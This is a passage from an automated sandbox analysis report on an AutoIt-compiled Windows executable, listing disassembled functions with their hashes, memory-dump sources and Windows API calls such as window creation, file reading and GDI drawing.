                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ExceptionRaise
                                        • String ID:
                                        • API String ID: 3997070919-0
                                        • Opcode ID: e15537669af3765af2a7ee3cd32d1cbe23abc84996e88b92fe5f3c04aeb78f64
                                        • Instruction ID: 1971768d346db4b959df0d54dc115534e5ff3edf93b4755051f11500da3b09fa
                                        • Opcode Fuzzy Hash: e15537669af3765af2a7ee3cd32d1cbe23abc84996e88b92fe5f3c04aeb78f64
                                        • Instruction Fuzzy Hash: 2AB15A31610618DFD719CF28D48AB657BE0FF05364F258698E8A9CF6E2C735EA81CB50
                                        Function 00C0B119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID: 0-3916222277
                                        • Opcode ID: 03e99d8b6a2fcbb1c543f5e47de19f3de1069bd839ae25cd96a4635f012a4c01
                                        • Instruction ID: d9e7c658eaa7fda0285758055044a9b210f41161a9aa1f00a6c4883a3cdc250e
                                        • Opcode Fuzzy Hash: 03e99d8b6a2fcbb1c543f5e47de19f3de1069bd839ae25cd96a4635f012a4c01
                                        • Instruction Fuzzy Hash: 8C126071D002299BDB24CF99C8806EEB7F5FF48710F14819AE849EB295DB349E85CF90
                                        Function 00C6EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • BlockInput.USER32(00000001), ref: 00C6EABD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: BlockInput
                                        • String ID:
                                        • API String ID: 3456056419-0
                                        • Opcode ID: c726f4085c32f1298783de59c7138ca59dc38b5cfaf19ff3362a0292b32a0673
                                        • Instruction ID: bd620766755ce0b34db25aad78ba9a15c9702feef1b6c8c45b0291360de3e822
                                        • Opcode Fuzzy Hash: c726f4085c32f1298783de59c7138ca59dc38b5cfaf19ff3362a0292b32a0673
                                        • Instruction Fuzzy Hash: A6E04F352102089FC710EF9AD894E9AFBE9AF98760F00846AFD49C7351DB70E8448BA0
                                        Function 00C109D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,00C103EE), ref: 00C109DA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: ExceptionFilterUnhandled
                                        • String ID:
                                        • API String ID: 3192549508-0
                                        • Opcode ID: 208748286aa7cbd5268d71ab2a14f382a0a8c3e80279be8455379df01578aaeb
                                        • Instruction ID: c0f1be094facfe399ceac26cb9976b406c46d3489e7b62a52e329e541ed4b6c0
                                        • Opcode Fuzzy Hash: 208748286aa7cbd5268d71ab2a14f382a0a8c3e80279be8455379df01578aaeb
                                        • Instruction Fuzzy Hash:
                                        Function 00C1781B Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0
                                        • API String ID: 0-4108050209
                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction ID: fe169e50378ca3bf2f5c419baec2494cdbb265ec9691ceb11c5171cf0793d7f4
                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                        • Instruction Fuzzy Hash: 8F51496160C6455BFB388569895D7FE63B99B03340F180709E8A2EB2C2C615DFCAF356
                                        Function 00C26DD9 Relevance: .6, Instructions: 637COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70a39f55a5eee6f9efa8592cc8d4504d03f8d2e0720277072d89b7b931bb4d64
                                        • Instruction ID: a01924a4060980837470544137e7b073f899ea2ab3c54473be3a1274efbfc8ac
                                        • Opcode Fuzzy Hash: 70a39f55a5eee6f9efa8592cc8d4504d03f8d2e0720277072d89b7b931bb4d64
                                        • Instruction Fuzzy Hash: E2323532D29F114DDB239634ECA6339A249AFB73C5F15D737E82AB5DA5EB28C5834100
                                        Function 00C0CC39 Relevance: .6, Instructions: 635COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c90238ef09f90a7e5dc7f5796bd31d5985fe42645ad4ace83fa68d1958c34baf
                                        • Instruction ID: cc0a6d281e97bcb194c560adca89adeafddf631b2b76129488e3fa456eb146c8
                                        • Opcode Fuzzy Hash: c90238ef09f90a7e5dc7f5796bd31d5985fe42645ad4ace83fa68d1958c34baf
                                        • Instruction Fuzzy Hash: 22321531A011558BDF68CF29C4D06BD7BA1FB45314F29866AD86A9B2F2D330DE81EB40
                                        Function 00BF7920 Relevance: .6, Instructions: 563COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: f20b7c0f683a69b1b2773aa2366413430d4b3075cb3820c33ce7f912953e4d48
                                        • Instruction ID: d7703d652c64ed057ab071415362b0b1c62d9ef4dfccc038c50ed7b368a848a2
                                        • Opcode Fuzzy Hash: f20b7c0f683a69b1b2773aa2366413430d4b3075cb3820c33ce7f912953e4d48
                                        • Instruction Fuzzy Hash: FE22A170A04609DFDF14CF65C881ABEB7F6FF44300F2046A9E816A7291EB36AE55DB50
                                        Function 00BF91C0 Relevance: .5, Instructions: 475COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5d02e6fdb9039b4093d271f4ae69fd5339abb3e3c5bcfc380c59b775baa3af0d
                                        • Instruction ID: acbc6e7ce674bc78bc0d85496dddb3a81b84b5dcb0cba513753db6678f004131
                                        • Opcode Fuzzy Hash: 5d02e6fdb9039b4093d271f4ae69fd5339abb3e3c5bcfc380c59b775baa3af0d
                                        • Instruction Fuzzy Hash: 9102C6B0A10209EBDF04DF54D881BAEBBF1FF44300F108169E9169B2D0EB31AE65DB94
                                        Function 00C29EEE Relevance: .3, Instructions: 294COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: bea3d08dc0a3e1c6de67ebe3017a4d2cc94e0b325b4b0093905e473b4c3ddedf
                                        • Instruction ID: 3157d210cf6851ad290b5594cb374fb4c846e68f951ed6a220ee6ae13d2bb721
                                        • Opcode Fuzzy Hash: bea3d08dc0a3e1c6de67ebe3017a4d2cc94e0b325b4b0093905e473b4c3ddedf
                                        • Instruction Fuzzy Hash: D2B1F120D6AF905DD3239639883533AB65CBFBB6D5F91D31BFC2674D62EB2286834140
                                        Function 00C11C77 Relevance: .3, Instructions: 254COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction ID: 2d81fd3c9bf53d47c937498aea5a27f7e525e9c64f3179aa44453de5e0fc442d
                                        • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                        • Instruction Fuzzy Hash: 3A9178722080A34ADB2A467A95740BDFFE15E533A171D079DDDF2CA1C1FE18C694F620
                                        Function 00C119B0 Relevance: .2, Instructions: 240COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction ID: c653a5ecfb7363f791370d582fbd84a6970e22646925927ba4ee14e2d587644f
                                        • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                        • Instruction Fuzzy Hash: C491537220D0A34ADB29467A85740BDFFE15A933A271E079DD9F2CA1C1FD18D6A4F620
                                        Function 00C17A4A Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e23dacf27165171d2c4ee72a24792b2f1198dc694be9ef862c24ac284ddb2247
                                        • Instruction ID: 9e73274fac0edd60eebe2d0a0ac21647be87ce2f770f34a8c107b82b89e94f27
                                        • Opcode Fuzzy Hash: e23dacf27165171d2c4ee72a24792b2f1198dc694be9ef862c24ac284ddb2247
                                        • Instruction Fuzzy Hash: 2261347120C709A7DE349A2889A5BFE23B4DF43700F241B1AE863DB281DB119FC6B355
                                        Function 00C17CA7 Relevance: .2, Instructions: 237COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 5a3f61fc25a6edd9a698cd4afdffde0ed26418edde8e5980f49c1811f85568e7
                                        • Instruction ID: b8daf7006399b45759c2bf5be6a70316bcd0cfef343ea67916ea4d2b351b5689
                                        • Opcode Fuzzy Hash: 5a3f61fc25a6edd9a698cd4afdffde0ed26418edde8e5980f49c1811f85568e7
                                        • Instruction Fuzzy Hash: B161497160C70D5BDE386A286895BFE23F49F43704F200B59E953DB281DA12EFC6B255
                                        Function 00C11706 Relevance: .2, Instructions: 232COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction ID: 37768e7391cccd23d7fe85f524f5861d594679898737d4c2f20053da99c20799
                                        • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                        • Instruction Fuzzy Hash: 7B8178325090A349EB5D463A85340BEFFE15A933A171E479DD9F2CA2C1EE18C794F660
                                        Function 00C62046 Relevance: .1, Instructions: 72COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: b580a00814184c35eb9796c100e22f4f5d0e5784cd38ee70b6daccc9fe79c2ec
                                        • Instruction ID: ee76b5bfb956ed5996050a8c2d52ae830f1f6e04cac9056382c7c0680cbe7e2b
                                        • Opcode Fuzzy Hash: b580a00814184c35eb9796c100e22f4f5d0e5784cd38ee70b6daccc9fe79c2ec
                                        • Instruction Fuzzy Hash: 2E21A5326206158BDB28CF79C862B7E73E5A754310F15862EE4A7C37D0DE39A904DB90
                                        Function 00C72ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00C72B30
                                        • DeleteObject.GDI32(00000000), ref: 00C72B43
                                        • DestroyWindow.USER32 ref: 00C72B52
                                        • GetDesktopWindow.USER32 ref: 00C72B6D
                                        • GetWindowRect.USER32(00000000), ref: 00C72B74
                                        • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00C72CA3
                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00C72CB1
                                        • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72CF8
                                        • GetClientRect.USER32(00000000,?), ref: 00C72D04
                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C72D40
                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D62
                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D75
                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D80
                                        • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D89
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72D98
                                        • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DA1
                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DA8
                                        • GlobalFree.KERNEL32(00000000), ref: 00C72DB3
                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72DC5
                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00C8FC38,00000000), ref: 00C72DDB
                                        • GlobalFree.KERNEL32(00000000), ref: 00C72DEB
                                        • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00C72E11
                                        • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00C72E30
                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C72E52
                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C7303F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2022144138.0000000000BF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BF0000, based on PE: true
                                        • Associated: 00000000.00000002.2022114283.0000000000BF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022207686.0000000000CB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022261060.0000000000CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2022283221.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_bf0000_DSD876543456780000.jbxd
                                        Similarity
                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                        • String ID: $AutoIt v3$DISPLAY$static
                                        • API String ID: 2211948467-2373415609
                                        • Opcode ID: 2aec5d9c2ab69df65843c72acf4b5770921f16022128ef7cd2bda074f2fb6d08
                                        • Instruction ID: 7d2012595850cf5e4bb3d818c5e4189fa8adebb0b0440e3a3a3ba235813ce82e
                                        • Opcode Fuzzy Hash: 2aec5d9c2ab69df65843c72acf4b5770921f16022128ef7cd2bda074f2fb6d08
                                        • Instruction Fuzzy Hash: 47027971900218AFDB14DFA4CC89FAE7BB9EF49714F048158F919AB2A1DB74ED01CB64
                                        Function 00C870D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetTextColor.GDI32(?,00000000), ref: 00C8712F
                                        • GetSysColorBrush.USER32(0000000F), ref: 00C87160
                                        • GetSysColor.USER32(0000000F), ref: 00C8716C
                                        • SetBkColor.GDI32(?,000000FF), ref: 00C87186
                                        • SelectObject.GDI32(?,?), ref: 00C87195
                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 00C871C0
                                        • GetSysColor.USER32(00000010), ref: 00C871C8
                                        • CreateSolidBrush.GDI32(00000000), ref: 00C871CF
                                        • FrameRect.USER32(?,?,00000000), ref: 00C871DE
                                        • DeleteObject.GDI32(00000000), ref: 00C871E5
                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 00C87230
                                        • FillRect.USER32(?,?,?), ref: 00C87262
                                        • GetWindowLongW.USER32(?,000000F0), ref: 00C87284
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(00000012), ref: 00C87421
                                          • Part of subcall function 00C873E8: SetTextColor.GDI32(?,?), ref: 00C87425
                                          • Part of subcall function 00C873E8: GetSysColorBrush.USER32(0000000F), ref: 00C8743B
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(0000000F), ref: 00C87446
                                          • Part of subcall function 00C873E8: GetSysColor.USER32(00000011), ref: 00C87463
                                          • Part of subcall function 00C873E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C87471
                                          • Part of subcall function 00C873E8: SelectObject.GDI32(?,00000000), ref: 00C87482
                                          • Part of subcall function 00C873E8: SetBkColor.GDI32(?,00000000), ref: 00C8748B
                                          • Part of subcall function 00C873E8: SelectObject.GDI32(?,?), ref: 00C87498
                                          • Part of subcall function 00C873E8: InflateRect.USER32(?,000000FF,000000FF), ref: 00C874B7
                                          • Part of subcall function 00C873E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C874CE
                                          • Part of subcall function 00C873E8: GetWindowLongW.USER32(00000000,000000F0), ref: 00C874DB
                                        Memory Dump Source
